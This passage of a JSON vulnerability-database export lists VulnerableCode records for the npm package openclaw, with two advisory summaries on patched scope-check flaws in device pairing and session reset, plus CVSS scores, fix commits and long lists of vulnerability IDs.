-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["GHSA-f275-5h5c-5wg5"],"risk_score":4.4,"exploitability":"0.5","weighted_severity":"8.8","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-k3up-1vdf-2uh9"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91677?format=json","vulnerability_id":"VCID-k52b-966p-ybbk","summary":"OpenClaw: /pair approve command path omitted caller scope subsetting and reopened device pairing escalation\n## Summary\n\nThe `/pair approve` command path called device approval without forwarding caller scopes into the core approval check.\n\n## Impact\n\nA caller that held pairing privileges but not admin privileges could approve a pending device request asking for broader scopes, including admin access.\n\n## Affected Component\n\n`extensions/device-pair/index.ts, src/infra/device-pairing.ts`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `4ee4960de2` (`Pairing: forward caller scopes during approval`).\n\nOpenClaw thanks @AntAISecurityLab for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33579","reference_id":"","reference_type":"","scores":[{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.05112","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.05097","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00021","scoring_system":"epss","scoring_elements":"0.06183","published_at":"2026-06-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33579"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/4ee4960de2330b5322127f925f3687dc6f105be1","reference_id":"","reference_type":"","scores":[{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/4ee4960de2330b5322127f925f3687dc6f105be1"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-hc5h-pmr3-3497","reference_id":"","reference_type":"","scores":[{"value":"9.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:39Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-hc5h-pmr3-3497"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33579","reference_id":"","reference_type":"","scores":[{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33579"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-missing-caller-scope-validation-in-device-pair-approval","reference_id":"","reference_type":"","scores":[{"value":"9.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:39Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-missing-caller-scope-validation-in-device-pair-approval"},{"reference_url":"https://github.com/advisories/GHSA-hc5h-pmr3-3497","reference_id":"GHSA-hc5h-pmr3-3497","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-hc5h-pmr3-3497"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["CVE-2026-33579","GHSA-hc5h-pmr3-3497"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-k52b-966p-ybbk"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90034?format=json","vulnerability_id":"VCID-k5da-7tht-w3bs","summary":"OpenClaw Gateway `operator.write` can reach admin-only session reset via `chat.send` `/reset`\n## Summary\n\nThe `chat.send` path reused command authorization to trigger `/reset` session rotation even though direct session reset is an admin-only control-plane operation.\n\n## Impact\n\nA write-scoped gateway caller could rotate a target session, archive the prior transcript state, and force a new session id without admin scope.\n\n## Affected Component\n\n`src/gateway/server-methods/chat.ts, src/auto-reply/reply/session.ts`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `be00fcfccb` (`Gateway: align chat.send reset scope checks`).","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/be00fcfccba108f88dc3d4380146c6e058770b03","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/be00fcfccba108f88dc3d4380146c6e058770b03"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.28","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.28"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-5r8f-96gm-5j6g","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-5r8f-96gm-5j6g"},{"reference_url":"https://github.com/advisories/GHSA-5r8f-96gm-5j6g","reference_id":"GHSA-5r8f-96gm-5j6g","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-5r8f-96gm-5j6g"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerab